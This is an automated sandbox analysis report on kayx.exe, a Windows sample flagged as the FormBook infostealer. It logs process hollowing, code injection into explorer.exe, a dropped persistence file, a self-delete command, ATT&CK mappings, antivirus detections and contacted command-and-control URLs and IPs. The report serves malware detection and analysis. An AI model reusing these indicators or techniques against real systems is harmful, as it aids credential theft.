          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E43D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E83540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00EB3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E27D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E0AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ECE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E8A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E316E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E176E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E48EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00EBFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E336CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E846A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E9FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E1766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E0E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00EBFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E38E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00EC1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E437F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E18794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E1FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E1EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E3E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E2F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kayx.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\kayx.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\kayx.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.141 80
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\kayx.exe | Memory written: C:\Users\user\Desktop\kayx.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\kayx.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\kayx.exe | Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Users\user\Desktop\kayx.exe | Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\kayx.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\mstsc.exe | Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\kayx.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\kayx.exe | Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3F0000
Source: C:\Users\user\Desktop\kayx.exe | Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: C:\Users\user\Desktop\kayx.exe | Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: C:\Users\user\Desktop\kayx.exe | Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Source: explorer.exe, 00000012.00000002.482884776.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\kayx.exe | Queries volume information: C:\Users\user\Desktop\kayx.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation
Source: C:\Users\user\Desktop\kayx.exe | Code function: 1_2_05C4C920 GetUserNameA,
Source: C:\Users\user\Desktop\kayx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Registry Run Keys / Startup Folder11 | Process Injection612 | Masquerading1 | Input Capture1 | Query Registry1 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder11 | Virtualization/Sandbox Evasion3 | LSASS Memory | Security Software Discovery321 | Remote Desktop Protocol | Archive Collected Data11 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection612 | NTDS | Process Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information11 | LSA Secrets | Account Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Owner/User Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery112 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Behavior Graph

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 321226 | Sample: kayx.exe | Startdate: 20/11/2020 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: www.amtpsychology.com
  Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 6 other signatures
  kayx.exe 1 4 (node 11) started
    Dropped: C:\Users\user\AppData\...\firefoxe.exe (PE32); C:\Users\...\firefoxe.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\kayx.exe.log (ASCII)
    Signatures: Detected unpacking (changes PE section rights); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    kayx.exe (node 15) started
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe 2 (node 22) injected
        DNS/IP: jibenentreprenad.mobi 184.168.131.241, 49744, 80 AS-26496-GO-DADDY-COM-LLCUS United States; www.jibenentreprenad.mobi; 2 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        mstsc.exe (node 26) started
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe 1 (node 33) started
            conhost.exe (node 35) started
        firefoxe.exe (node 29) started
        firefoxe.exe (node 31) started
    kayx.exe (node 18) started
    kayx.exe (node 20) started

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
kayx.exe | 35% | Virustotal |
kayx.exe | 46% | ReversingLabs | ByteCode-MSIL.Infostealer.Maslog
kayx.exe | 100% | Avira | TR/Dropper.MSIL.blecg
kayx.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | 100% | Avira | TR/Dropper.MSIL.blecg
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | 46% | ReversingLabs | ByteCode-MSIL.Infostealer.Maslog

Unpacked PE Files

Source | Detection | Scanner | Label
17.2.kayx.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
17.1.kayx.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX | 0% | Avira URL Cloud | safe
http://crl.v | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
jibenentreprenad.mobi | 184.168.131.241 | true | true | | unknown
ext-sq.squarespace.com | 198.185.159.141 | true | false | | high
www.jibenentreprenad.mobi | unknown | unknown | true | | unknown
www.ghoster.agency | unknown | unknown | true | | unknown
www.amtpsychology.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX | true | Avira URL Cloud: safe | unknown
http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.carterandcone.coml | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.typography.netD | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://fontfabrik.com | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
